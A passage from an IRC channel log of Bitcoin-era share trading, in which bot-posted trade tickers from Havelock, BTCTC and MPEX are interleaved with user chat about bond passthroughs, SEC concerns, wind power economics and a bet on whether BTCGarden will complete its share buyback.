17:39:06 [HAVELOCK] [AM100] 93 @ 0.0368899 = 3.4308 BTC [+] Aug 12 17:39:09 [HAVELOCK] [AM100] 3 @ 0.03689 = 0.1107 BTC [+] Aug 12 17:39:11 [HAVELOCK] [AM100] 3 @ 0.0369 = 0.1107 BTC [+] Aug 12 17:39:13 [HAVELOCK] [AM100] 5 @ 0.03699 = 0.185 BTC [+] Aug 12 17:39:15 [HAVELOCK] [AM100] 30 @ 0.03699 = 1.1097 BTC [+] Aug 12 17:39:17 [HAVELOCK] [AM100] 15 @ 0.036998 = 0.555 BTC [+] Aug 12 17:39:18 [HAVELOCK] [AM100] 101 @ 0.037 = 3.737 BTC [+] Aug 12 17:39:33 [BTCTC] [LABCOIN] 30 @ 0.001571 = 0.0471 BTC [-] Aug 12 17:39:34 [BTCTC] [LABCOIN] 6 @ 0.001572 = 0.0094 BTC [+] Aug 12 17:40:06 [HAVELOCK] [AM100] 144 @ 0.037 = 5.328 BTC [+] Aug 12 17:40:30 [HAVELOCK] [AM100] 97 @ 0.0373999 = 3.6278 BTC [+] Aug 12 17:40:30 [HAVELOCK] [AM100] 10 @ 0.0374 = 0.374 BTC [+] Aug 12 17:40:30 [HAVELOCK] [AM100] 49 @ 0.0375 = 1.8375 BTC [+] Aug 12 17:40:34 [HAVELOCK] [AM100] 4 @ 0.036 = 0.144 BTC [-] Aug 12 17:40:34 [BTCTC] [LABCOIN] 2 @ 0.001573 = 0.0031 BTC [+] Aug 12 17:40:35 [HAVELOCK] [AM100] 26 @ 0.0375 = 0.975 BTC [+] Aug 12 17:40:38 [HAVELOCK] [AM100] 10 @ 0.0379 = 0.379 BTC [+] Aug 12 17:40:38 [HAVELOCK] [AM100] 1 @ 0.038 BTC [+] Aug 12 17:44:01 [BTCTC] [DMS.PURCHASE] 160 @ 0.02806 = 4.4896 BTC [-] Aug 12 17:45:24 [BTCTC] [BASIC-MINING] 9 @ 0.3178 = 2.8602 BTC [-] Aug 12 17:45:46 [BTCTC] [LABCOIN] 30 @ 0.001569 = 0.0471 BTC [-] Aug 12 17:45:47 [BTCTC] [LABCOIN] 3 @ 0.00157 = 0.0047 BTC [+] Aug 12 17:45:48 [BTCTC] [LABCOIN] 2 @ 0.001573 = 0.0031 BTC [+] Aug 12 17:45:50 [BTCTC] [LABCOIN] 20 @ 0.001574 = 0.0315 BTC [+] Aug 12 17:45:51 [BTCTC] [LABCOIN] 12 @ 0.001597 = 0.0192 BTC [+] Aug 12 17:45:52 [BTCTC] [LABCOIN] 100 @ 0.001598 = 0.1598 BTC [+] Aug 12 17:45:53 [BTCTC] [LABCOIN] 2513 @ 0.001599 = 4.0183 BTC [+] Aug 12 17:48:26 [BTCTC] [DMS.MINING] 10 @ 0.003422 = 0.0342 BTC [+] Aug 12 17:48:28 [BTCTC] [DMS.MINING] 150 @ 0.003421 = 0.5132 BTC [-] Aug 12 17:50:14 [HAVELOCK] [VTX] 2 @ 0.54 = 1.08 BTC [+] Aug 12 17:50:35 [HAVELOCK] [VTX] 6 @ 0.5459 = 3.2754 BTC [+] Aug 12 17:50:42 [HAVELOCK] [VTX] 1 @ 0.55 BTC [+] Aug 12 17:51:32 [BTCTC] [BTC-BOND] 284 @ 0.009999 = 2.8397 BTC [+] Aug 12 17:56:04 [HAVELOCK] [AM100] 3 @ 0.036 = 0.108 BTC [-] Aug 12 17:57:26 [BTCTC] [LABCOIN] 30 @ 0.00155 = 0.0465 BTC [-] Aug 12 17:57:28 [BTCTC] [LABCOIN] 1 @ 0.001551 BTC [+] Aug 12 17:57:29 [BTCTC] [LABCOIN] 20 @ 0.001552 = 0.031 BTC [+] Aug 12 17:57:30 [BTCTC] [LABCOIN] 12 @ 0.001559 = 0.0187 BTC [+] Aug 12 17:57:31 [BTCTC] [LABCOIN] 100 @ 0.00156 = 0.156 BTC [+] Aug 12 17:57:32 [BTCTC] [LABCOIN] 2500 @ 0.001592 = 3.98 BTC [+] Aug 12 17:57:32 [BTCTC] [LABCOIN] 5337 @ 0.001593 = 8.5018 BTC [+] Aug 12 17:57:57 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Aug 12 17:58:10 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Aug 12 17:58:40 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Aug 12 17:58:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.04037 = 0.1211 BTC [+] Aug 12 17:58:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.04038 = 2.019 BTC [+] Aug 12 17:58:57 [BTCTC] [TAT.ASICMINER] 47 @ 0.0404 = 1.8988 BTC [+] Aug 12 17:58:58 [BTCTC] [ASICMINER-PT] 10 @ 4.177 = 41.77 BTC [-] Aug 12 17:59:50 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Aug 12 18:00:23 [BTCTC] [ASICMINER-PT] 8 @ 4.177 = 33.416 BTC [-] Aug 12 18:00:28 [BTCTC] [TAT.ASICMINER] 100 @ 0.0404 = 4.04 BTC [+] Aug 12 18:01:56 [HAVELOCK] [AM100] 4 @ 0.0378 = 0.1512 BTC [+] Aug 12 18:01:58 [HAVELOCK] [AM100] 3 @ 0.0378 = 0.1134 BTC [+] Aug 12 18:02:01 [HAVELOCK] [AM100] 10 @ 0.0379 = 0.379 BTC [+] Aug 12 18:02:03 [HAVELOCK] [AM100] 77 @ 0.038 = 2.926 BTC [+] Aug 12 18:02:18 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [-] Aug 12 18:02:49 [BTCTC] [LABCOIN] 1 @ 0.001586 BTC [-] Aug 12 18:05:53 Why is evoorhees cheerleading for IceDrill? https://bitcointalk.org/index.php?topic=269216.msg2917845#msg2917845 Aug 12 18:06:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.0404 = 0.1616 BTC [+] Aug 12 18:07:52 [BTCTC] [LABCOIN] 10 @ 0.001582 = 0.0158 BTC [-] Aug 12 18:08:08 [BTCTC] [LABCOIN] 30 @ 0.001543 = 0.0463 BTC [-] Aug 12 18:08:09 [BTCTC] [LABCOIN] 5 @ 0.001542 = 0.0077 BTC [-] Aug 12 18:08:10 [BTCTC] [LABCOIN] 1307 @ 0.00154 = 2.0128 BTC [-] Aug 12 18:08:20 hey ThickAsThieves Aug 12 18:08:29 you like running passthroughs right/ Aug 12 18:08:45 [BTCTC] [LABCOIN] 30 @ 0.001544 = 0.0463 BTC [+] Aug 12 18:08:47 [BTCTC] [LABCOIN] 20 @ 0.001543 = 0.0309 BTC [-] Aug 12 18:08:48 [BTCTC] [LABCOIN] 5 @ 0.00154 = 0.0077 BTC [-] Aug 12 18:08:49 [BTCTC] [LABCOIN] 36 @ 0.001536 = 0.0553 BTC [-] Aug 12 18:08:51 [BTCTC] [LABCOIN] 294 @ 0.001535 = 0.4513 BTC [-] Aug 12 18:08:52 [BTCTC] [LABCOIN] 6 @ 0.001531 = 0.0092 BTC [-] Aug 12 18:08:53 [BTCTC] [LABCOIN] 50 @ 0.00153 = 0.0765 BTC [-] Aug 12 18:08:54 [BTCTC] [LABCOIN] 25 @ 0.001529 = 0.0382 BTC [-] Aug 12 18:08:55 [BTCTC] [LABCOIN] 207 @ 0.001528 = 0.3163 BTC [-] Aug 12 18:08:56 [BTCTC] [LABCOIN] 23 @ 0.001527 = 0.0351 BTC [-] Aug 12 18:08:56 [BTCTC] [LABCOIN] 189 @ 0.001526 = 0.2884 BTC [-] Aug 12 18:08:57 [BTCTC] [LABCOIN] 822 @ 0.001521 = 1.2503 BTC [-] Aug 12 18:08:59 well... Aug 12 18:08:59 [BTCTC] [LABCOIN] 5361 @ 0.00152 = 8.1487 BTC [-] Aug 12 18:09:08 i enjoy other things as well Aug 12 18:09:11 but sure Aug 12 18:10:20 well Aug 12 18:10:30 if I started doing bonds for dmc 2.o Aug 12 18:10:31 er, 0 Aug 12 18:10:51 [BTCTC] [LABCOIN] 30 @ 0.001523 = 0.0457 BTC [+] Aug 12 18:10:53 [BTCTC] [LABCOIN] 155 @ 0.001522 = 0.2359 BTC [-] Aug 12 18:10:54 [BTCTC] [LABCOIN] 1217 @ 0.00152 = 1.8498 BTC [-] Aug 12 18:11:18 would you be interested in doing a passthrough where you sell shares of a really huge bond, collect the money, and then purchase said bond from my company Aug 12 18:11:54 ThickAsThieves i think he's cheerleading for dt. Aug 12 18:11:55 Youd think these kind of convos would happen in a less public forum Aug 12 18:12:21 matuszed: what kind Aug 12 18:12:29 At least a PM Aug 12 18:12:45 mircea_popescu reddit loves you Aug 12 18:12:46 matuszed nope. Aug 12 18:12:53 this is the point : we're open. Aug 12 18:12:57 i was just reading all about you over on the reddit Aug 12 18:13:04 jcpham haha what now ? Aug 12 18:13:11 some thread Aug 12 18:13:28 specualtion about you being PR Aug 12 18:13:30 ssdd Aug 12 18:15:07 [MPEX] [S.MPOE] 8987 @ 0.00084768 = 7.6181 BTC [+] Aug 12 18:15:09 [MPEX] [S.MPOE] 2413 @ 0.00084871 = 2.0479 BTC [+] Aug 12 18:15:25 [BTCTC] [ACTIVEMINING] 2 @ 0.00584 = 0.0117 BTC [-] Aug 12 18:15:37 ThickAsThieves: the problem with crowdsourcing large projects like this is the SEC has yet to actually give any real guidance for it Aug 12 18:15:46 [MPEX] [S.MPOE] 12900 @ 0.00084871 = 10.9484 BTC [+] Aug 12 18:15:48 [BTCTC] [TAT.ASICMINER] 81 @ 0.0404 = 3.2724 BTC [+] Aug 12 18:16:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.0404 = 2.02 BTC [+] Aug 12 18:16:54 kinda predictable by now. me being the pr chick, me being the evil scammor, me and my suits, me and children, me and whatnot. Aug 12 18:17:16 ThickAsThieves: so someone would have to actually have his real identity on the paperwork Aug 12 18:18:11 [BTCTC] [LABCOIN] 3 @ 0.001568 = 0.0047 BTC [+] Aug 12 18:18:52 [BTCTC] [LABCOIN] 2 @ 0.001565 = 0.0031 BTC [-] Aug 12 18:19:07 Diablo, why would i want to be involved in what you suggest? Aug 12 18:19:18 [BTCTC] [LABCOIN] 1 @ 0.001529 BTC [-] Aug 12 18:19:39 ThickAsThieves: dunno, seems you like getting involved in lots of passthroughs Aug 12 18:20:01 [BTCTC] [LABCOIN] 1 @ 0.001563 BTC [+] Aug 12 18:20:15 i'm getting involved in making money Aug 12 18:20:22 PTs are just part of it Aug 12 18:20:38 [BTCTC] [LABCOIN] 2 @ 0.00156 = 0.0031 BTC [-] Aug 12 18:20:39 ThickAsThieves: Im not just offering it to you btw Aug 12 18:20:40 i'm not sure why i'd put my name on DMC Aug 12 18:20:44 Im offering it to anyone who wants to do it Aug 12 18:20:49 ok Aug 12 18:20:55 hehe Aug 12 18:21:01 i feel special now Aug 12 18:21:03 I imagine there would be several, one for each exchange Aug 12 18:21:11 [BTCTC] [LABCOIN] 1 @ 0.00156 BTC [-] Aug 12 18:21:17 ThickAsThieves: the problem is just the SEC alone Aug 12 18:21:22 they want to know every investor Aug 12 18:21:33 because they're nosey bastards and think everything is mob money Aug 12 18:21:43 you have other problems too Aug 12 18:22:07 [BTCTC] [LABCOIN] 1 @ 0.001561 BTC [+] Aug 12 18:22:11 the scale of your idea, as I recall it, seemed bigger than your britches, no? Aug 12 18:22:35 [HAVELOCK] [SMG] 740 @ 0.0002019 = 0.1494 BTC [-] Aug 12 18:22:44 [BTCTC] [LABCOIN] 1 @ 0.001563 BTC [+] Aug 12 18:23:07 [BTCTC] [LABCOIN] 1 @ 0.00156 BTC [-] Aug 12 18:23:19 [BTCTC] [DMS.MINING] 1 @ 0.003423 BTC [+] Aug 12 18:23:20 [BTCTC] [DMS.SELLING] 1 @ 0.0259 BTC [-] Aug 12 18:23:21 [BTCTC] [LABCOIN] 1 @ 0.001562 BTC [+] Aug 12 18:23:25 [BTCTC] [DMS.PURCHASE] 1 @ 0.02806 BTC [-] Aug 12 18:23:36 ThickAsThieves: thats a problem that has actually solved itself Aug 12 18:23:40 the company is being split into two Aug 12 18:23:47 each one handling part of the problem Aug 12 18:24:06 [BTCTC] [DMS.MINING] 25 @ 0.003423 = 0.0856 BTC [+] Aug 12 18:24:09 I havent been around as long as you, but so far what ive learned is that you sorta ran DMC, and are in the process of sorta closing it. what i don't get is what you do now, and how you plan to pull off something new and larger. Aug 12 18:24:52 [BTCTC] [DMS.MINING] 25 @ 0.003423 = 0.0856 BTC [+] Aug 12 18:24:56 do you have lawyers setting you up for this venture? Aug 12 18:25:23 ThickAsThieves: not yet, I managed to get advisors though Aug 12 18:25:35 [BTCTC] [DMS.MINING] 24 @ 0.003423 = 0.0822 BTC [+] Aug 12 18:25:38 a lot of real world investors thought what I did was interesting, even if it didnt quite work Aug 12 18:26:21 [BTCTC] [LABCOIN] 1 @ 0.001559 BTC [-] Aug 12 18:26:36 ThickAsThieves: but basically, the dmc plan is being split in half Aug 12 18:26:44 one focusing on compute, the other focusing on green power Aug 12 18:27:09 green power? or renewable power? Aug 12 18:27:14 green. Aug 12 18:27:22 so no solar? Aug 12 18:27:23 next gen solar and wind alone. Aug 12 18:27:30 ah Aug 12 18:27:31 well Aug 12 18:27:46 solar and wind are not renewable: once the sun burns out, we cant go buy another at walmart Aug 12 18:27:47 I do believe solar power is a good thing to get into currently Aug 12 18:27:48 [HAVELOCK] [SMG] 740 @ 0.0002018 = 0.1493 BTC [-] Aug 12 18:28:11 [HAVELOCK] [SMG] 740 @ 0.0002019 = 0.1494 BTC [+] Aug 12 18:28:12 ThickAsThieves: the compute side has a problem where we're looking at at least 3 major new techs Aug 12 18:28:16 that juts arent out yet, but we need Aug 12 18:28:29 agree on solar, I am very skeptical about wind power however Aug 12 18:28:41 I live up here in maine Aug 12 18:28:54 using next gen wind turbines, we can power maine on wind alone Aug 12 18:29:00 and not have to spam turbines Aug 12 18:29:18 [BTCTC] [LABCOIN] 1 @ 0.001562 BTC [+] Aug 12 18:29:31 [BTCTC] [DMS.PURCHASE] 1 @ 0.02806 BTC [-] Aug 12 18:30:12 [BTCTC] [DMS.PURCHASE] 12 @ 0.02806 = 0.3367 BTC [-] Aug 12 18:30:21 next gen wind should be able to do a megawatt in half a million dollars Aug 12 18:31:00 as long as it does not have to stop when there is too much wind. or break every other day Aug 12 18:31:35 they dont really do that anymore Aug 12 18:31:39 modern turbines rarely fail Aug 12 18:31:50 and turbines only halt in 60+ mph winds anymore Aug 12 18:32:10 and now they have ones that turn the blades Aug 12 18:32:14 to make it unareodynamic Aug 12 18:32:21 so even in >60mph winds it can spin <60mph Aug 12 18:32:39 so it doesnt even have to halt then Aug 12 18:33:25 oh and btw, lets say we get enough wind to keep it doing at least half the nameplate rating Aug 12 18:33:33 (which is possible in some areas of maine, really windy) Aug 12 18:33:54 [BTCTC] [ASICMINER-PT] 5 @ 4.061 = 20.305 BTC [+] Aug 12 18:34:04 das it maine Aug 12 18:34:04 thats about quarter of a million dollars at current bulk rates Aug 12 18:34:18 in other words, the turbines pay for themselves in 2 years Aug 12 18:34:30 [BTCTC] [DMS.PURCHASE] 2 @ 0.02806 = 0.0561 BTC [-] Aug 12 18:35:10 pretty cool Aug 12 18:35:27 what Im thinking is for the bonds Aug 12 18:35:39 over a 20 year period, pay 2x what was paid in Aug 12 18:36:07 Wait, the sun is going to be around another 5 billion years, without the sun there is no life at all. There would also be no wind or atmosphere]\ Aug 12 18:36:17 Hollywood: or planet Aug 12 18:36:32 it would expand into a red giant and the new surface would be outside the orbit of earth Aug 12 18:37:00 [BTCTC] [ACTIVEMINING] 1 @ 0.005836 BTC [-] Aug 12 18:37:23 yes, I am aware. Looking at what you stated I thought you were speaking as if we were consuming the sun Aug 12 18:37:24 [BTCTC] [LABCOIN] 3 @ 0.001558 = 0.0047 BTC [-] Aug 12 18:37:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0401 BTC [-] Aug 12 18:39:51 [BTCTC] [LABCOIN] 1 @ 0.001537 BTC [-] Aug 12 18:40:08 [BTCTC] [LABCOIN] 1 @ 0.001535 BTC [-] Aug 12 18:40:09 [BTCTC] [NASTY-PT] 1 @ 0.00404 BTC [+] Aug 12 18:40:11 [BTCTC] [NASTY-PT] 28 @ 0.00409 = 0.1145 BTC [+] Aug 12 18:40:12 [BTCTC] [NASTY-PT] 34 @ 0.00411 = 0.1397 BTC [+] Aug 12 18:40:13 [BTCTC] [NASTY-PT] 53 @ 0.004139 = 0.2194 BTC [+] Aug 12 18:40:13 [BTCTC] [NASTY-PT] 50 @ 0.00417 = 0.2085 BTC [+] Aug 12 18:40:15 [BTCTC] [NASTY-PT] 15 @ 0.004184 = 0.0628 BTC [+] Aug 12 18:40:16 [BTCTC] [NASTY-PT] 100 @ 0.004186 = 0.4186 BTC [+] Aug 12 18:40:17 [BTCTC] [NASTY-PT] 200 @ 0.0044 = 0.88 BTC [+] Aug 12 18:40:18 [BTCTC] [NASTY-PT] 19 @ 0.0045 = 0.0855 BTC [+] Aug 12 18:40:23 Hollywood i think technically the atmosphere would stay in place Aug 12 18:40:26 [BTCTC] [LABCOIN] 1 @ 0.001533 BTC [-] Aug 12 18:40:39 obviously the sun going away would cause an explosion which'd tear it off, but still Aug 12 18:40:41 [BTCTC] [LABCOIN] 80 @ 0.001532 = 0.1226 BTC [-] Aug 12 18:40:58 [BTCTC] [LABCOIN] 1 @ 0.00153 BTC [-] Aug 12 18:41:08 well, it would burn off - Our sun will not explode Aug 12 18:41:40 [BTCTC] [LABCOIN] 1 @ 0.001529 BTC [-] Aug 12 18:41:52 [BTCTC] [LABCOIN] 50 @ 0.001526 = 0.0763 BTC [-] Aug 12 18:42:06 [BTCTC] [LABCOIN] 10 @ 0.00152 = 0.0152 BTC [-] Aug 12 18:42:19 [BTCTC] [LABCOIN] 10 @ 0.001515 = 0.0152 BTC [-] Aug 12 18:42:21 [BTCTC] [LABCOIN] 50 @ 0.00151 = 0.0755 BTC [-] Aug 12 18:43:06 [BTCTC] [LABCOIN] 30 @ 0.001496 = 0.0449 BTC [-] Aug 12 18:43:08 [BTCTC] [LABCOIN] 80 @ 0.001495 = 0.1196 BTC [-] Aug 12 18:43:09 [BTCTC] [LABCOIN] 12 @ 0.001481 = 0.0178 BTC [-] Aug 12 18:43:10 [BTCTC] [LABCOIN] 100 @ 0.00148 = 0.148 BTC [-] Aug 12 18:43:11 [BTCTC] [LABCOIN] 1 @ 0.001471 BTC [-] Aug 12 18:43:12 [BTCTC] [LABCOIN] 10 @ 0.00147 = 0.0147 BTC [-] Aug 12 18:43:14 [BTCTC] [LABCOIN] 286 @ 0.001468 = 0.4198 BTC [-] Aug 12 18:43:15 [BTCTC] [LABCOIN] 2500 @ 0.001467 = 3.6675 BTC [-] Aug 12 18:43:16 [BTCTC] [LABCOIN] 212 @ 0.001467 = 0.311 BTC [-] Aug 12 18:43:24 [HAVELOCK] [SMG] 755 @ 0.0002019 = 0.1524 BTC [+] Aug 12 18:43:34 Hollywood red giant neh ? Aug 12 18:43:48 [BTCTC] [LABCOIN] 30 @ 0.001483 = 0.0445 BTC [+] Aug 12 18:44:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0392 BTC [-] Aug 12 18:44:53 [BTCTC] [LABCOIN] 684 @ 0.001466 = 1.0027 BTC [-] Aug 12 18:45:24 [BTCTC] [LABCOIN] 316 @ 0.001466 = 0.4633 BTC [-] Aug 12 18:45:42 how long do you guys think it will be until the buyback of btcgarden is complete? Aug 12 18:45:50 [BTCTC] [LABCOIN] 533 @ 0.001465 = 0.7808 BTC [-] Aug 12 18:46:13 [BTCTC] [LABCOIN] 167 @ 0.001465 = 0.2447 BTC [-] Aug 12 18:46:15 [BTCTC] [LABCOIN] 85 @ 0.001462 = 0.1243 BTC [-] Aug 12 18:46:16 [BTCTC] [LABCOIN] 1000 @ 0.001461 = 1.461 BTC [-] Aug 12 18:46:16 hm? Aug 12 18:46:17 [BTCTC] [LABCOIN] 500 @ 0.00146 = 0.73 BTC [-] Aug 12 18:46:22 why are they buying back? Aug 12 18:46:38 kakobrekla http://trilema.com/2013/the-anatomy-of-another-scam/ Aug 12 18:46:39 chinese triads Aug 12 18:46:51 and actually, this inspires a bet. Aug 12 18:47:09 whats the bet Aug 12 18:49:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.02806 BTC [-] Aug 12 18:49:33 humm Aug 12 18:49:34 [MPEX] [S.MPOE] 1203 @ 0.00084745 = 1.0195 BTC [-] Aug 12 18:49:42 what is the buyback price? Aug 12 18:50:11 .0016 Aug 12 18:50:34 ipo was at 0.001 iirc? Aug 12 18:50:36 same as the IPO Aug 12 18:50:41 ah Aug 12 18:50:49 so pump n dump Aug 12 18:51:02 http://bitbet.us/bet/511/btcgarden-will-complete-its-buyback/ Aug 12 18:51:03 there. Aug 12 18:51:04 but with a btc asset instead of alt chain Aug 12 18:51:08 BitBet - BTCGarden will complete its buyback Aug 12 18:51:10 wait .016 Aug 12 18:51:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.0393 = 0.9825 BTC [+] Aug 12 18:51:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0393 = 0.393 BTC [+] Aug 12 18:52:21 yeah, .016 - same as the IPO Aug 12 18:52:46 [BTCTC] [LABCOIN] 3 @ 0.001482 = 0.0044 BTC [+] Aug 12 18:52:54 [11:37:25] yes, I am aware. Looking at what you stated I thought you were speaking as if we were consuming the sun Aug 12 18:52:59 no, its just consuming itself Aug 12 18:53:21 [HAVELOCK] [LABCO] 10 @ 0.00131 = 0.0131 BTC [-] Aug 12 18:53:52 [HAVELOCK] [LABCO] 490 @ 0.0013 = 0.637 BTC [-] Aug 12 18:54:09 so I wonder what btcgarden is up to Aug 12 18:54:18 I wonder if they realized they ran into the same problem I did Aug 12 18:54:33 how is it the same problem? Aug 12 18:54:47 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 18:54:48 well, I didnt read their entire post but Aug 12 18:54:55 selling the shares isnt legal to begin with Aug 12 18:54:58 okay thats the "actual" dividend Aug 12 18:54:59 for xbond Aug 12 18:55:08 ignore the 8x previous announcements :p Aug 12 18:55:15 lol Aug 12 18:55:45 [HAVELOCK] [LABCO] 500 @ 0.0013 = 0.65 BTC [-] Aug 12 18:56:17 [HAVELOCK] [LABCO] 100 @ 0.0013 = 0.13 BTC [-] Aug 12 18:57:19 [BTCTC] [TAT.ASICMINER] 16 @ 0.0392 = 0.6272 BTC [-] Aug 12 18:57:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.03911 = 0.7822 BTC [-] Aug 12 18:57:21 [BTCTC] [TAT.ASICMINER] 69 @ 0.0391 = 2.6979 BTC [-] Aug 12 18:58:10 [HAVELOCK] [XBOND] 17 @ 0.0010381 = 0.0176 BTC [-] Aug 12 19:00:13 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:00:16 [HAVELOCK] [CFIG] 88 @ 0.15 = 13.2 BTC Aug 12 19:00:19 [HAVELOCK] [CFIG] 100 @ 0.15 = 15 BTC Aug 12 19:00:22 [HAVELOCK] [CFIG] 6 @ 0.15 = 0.9 BTC Aug 12 19:00:25 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 19:00:28 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 12 19:00:31 [HAVELOCK] [CFIG] 30 @ 0.15 = 4.5 BTC Aug 12 19:00:31 mircea_popescu: are you saying btcgarden would so as far as not give anything back? Aug 12 19:00:33 [HAVELOCK] [CFIG] 19 @ 0.15 = 2.85 BTC Aug 12 19:00:34 [HAVELOCK] [CFIG] 30 @ 0.15 = 4.5 BTC Aug 12 19:00:36 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 12 19:00:39 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 12 19:00:41 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:00:43 they could have disappeared earlier Aug 12 19:00:44 [HAVELOCK] [XBOND] 419 @ 0.0010361 = 0.4341 BTC [-] Aug 12 19:00:45 pankkake im not sayin' anything, tis a bet. Aug 12 19:01:15 i figure it's useful if peoplewant to hedge their exposure over this dubious interval. Aug 12 19:01:20 well it's likely they don't do the buyback on time Aug 12 19:01:33 how does bitbet work? who releases the money in the bet once one side wins? Aug 12 19:02:10 bobbabad there's mods. Aug 12 19:02:21 pankkake it was 24 hours they said, about 12 hours ago Aug 12 19:02:31 noon on the 15th is 70 hours away. Aug 12 19:02:56 anyway, the idea is, if someone has exposure and is worried can take the no side. the honest opperator can make a little btc by covering the yes side. Aug 12 19:02:58 umm.. where did they ever say 24hours? Aug 12 19:03:17 All of above will be finished in 24-48 hours from the time you see this notice. Aug 12 19:03:18 yeah, I get that part Aug 12 19:03:24 https://bitcointalk.org/index.php?topic=264696.msg2914929#msg2914929 Aug 12 19:03:31 [BTCT.CO] [IPO-cancelled] BTCGARDEN MINER---Eyes to the horizon Aug 12 19:03:43 [BTCTC] [BASIC-MINING] 2 @ 0.2965 = 0.593 BTC [-] Aug 12 19:03:49 gotcha, 24-48hours Aug 12 19:04:05 yeah. so technically until the 14th at the most. Aug 12 19:04:17 3 am on the 14th or w/e. Aug 12 19:04:34 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:04:55 I would bet yes, hoping a lot of people are going to do the smart thing and hedge Aug 12 19:05:00 [BTCTC] [COGNITIVE] 2 @ 0.3654 = 0.7308 BTC [+] Aug 12 19:05:01 i'll say this much tho, if they've not paid by noon thursday it's quite unlikely they're ever paying. Aug 12 19:05:02 but btc garden shareholders aren't smart Aug 12 19:05:04 to me it sounds like short time to convert that amount of previously converted btc to fiat back to btc Aug 12 19:05:04 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 12 19:05:06 [HAVELOCK] [CFIG] 30 @ 0.15 = 4.5 BTC Aug 12 19:05:11 [HAVELOCK] [CFIG] 35 @ 0.15 = 5.25 BTC Aug 12 19:05:16 [HAVELOCK] [CFIG] 18 @ 0.15 = 2.7 BTC Aug 12 19:05:19 [HAVELOCK] [XBOND] 445 @ 0.0010361 = 0.4611 BTC [-] Aug 12 19:05:22 [HAVELOCK] [XBOND] 87 @ 0.001036 = 0.0901 BTC [-] Aug 12 19:05:27 [HAVELOCK] [CFIG] 50 @ 0.15 = 7.5 BTC Aug 12 19:05:30 [BTCTC] [COGNITIVE] 10 @ 0.365 = 3.65 BTC [-] Aug 12 19:05:31 [HAVELOCK] [CFIG] 42 @ 0.15 = 6.3 BTC Aug 12 19:05:34 [BTCTC] [COGNITIVE] 1 @ 0.365 BTC [-] Aug 12 19:05:36 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:05:37 pankkake admitting such shareholders exist, which seems quite unlikely. Aug 12 19:05:48 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 12 19:05:57 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:06:00 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:06:01 that's the other thing : now we get to find out exactly how much of the claimed 30k+ btc is actually in private hands. Aug 12 19:06:13 [HAVELOCK] [AM100] 6 @ 0.0362 = 0.2172 BTC [-] Aug 12 19:06:14 Will we be able to see the buyback in progress on here, via assbot? Aug 12 19:06:22 the people who bought at 17-18 certainly aren't garden Aug 12 19:06:30 how do you reeason ? Aug 12 19:06:31 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:06:33 Well, Icedril changed that (we have to sell out) to (we do not have to sell all IPO) Aug 12 19:06:33 [BTCTC] [LABCOIN] 30 @ 0.001498 = 0.0449 BTC [+] Aug 12 19:06:34 [BTCTC] [LABCOIN] 20 @ 0.001497 = 0.0299 BTC [-] Aug 12 19:06:36 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 19:06:39 [BTCTC] [LABCOIN] 75 @ 0.001496 = 0.1122 BTC [-] Aug 12 19:06:42 [HAVELOCK] [XBOND] 446 @ 0.0010341 = 0.4612 BTC [-] Aug 12 19:06:45 [HAVELOCK] [XBOND] 6 @ 0.001034 = 0.0062 BTC [-] Aug 12 19:06:47 [HAVELOCK] [XBOND] 29 @ 0.001033 = 0.03 BTC [-] Aug 12 19:06:49 [HAVELOCK] [XBOND] 62 @ 0.0010311 = 0.0639 BTC [-] Aug 12 19:06:50 hahaha Aug 12 19:06:51 [HAVELOCK] [AM100] 1 @ 0.036105 BTC [-] Aug 12 19:07:04 [HAVELOCK] [AM100] 3 @ 0.036105 = 0.1083 BTC [-] Aug 12 19:07:07 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:07:10 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:07:12 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 12 19:07:14 [HAVELOCK] [SMG] 770 @ 0.0001981 = 0.1525 BTC [-] Aug 12 19:07:17 [HAVELOCK] [AM100] 1 @ 0.036105 BTC [-] Aug 12 19:07:19 [HAVELOCK] [AM100] 5 @ 0.0362 = 0.181 BTC [+] Aug 12 19:07:22 [HAVELOCK] [SMG] 770 @ 0.0001981 = 0.1525 BTC [-] Aug 12 19:07:24 [HAVELOCK] [SMG] 4230 @ 0.000198 = 0.8375 BTC [-] Aug 12 19:07:29 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 12 19:07:30 [BTCTC] [LABCOIN] 30 @ 0.001484 = 0.0445 BTC [-] Aug 12 19:07:31 [HAVELOCK] [SMG] 770 @ 0.000198 = 0.1525 BTC [-] Aug 12 19:07:34 [BTCTC] [LABCOIN] 18 @ 0.001483 = 0.0267 BTC [-] Aug 12 19:07:35 [BTCTC] 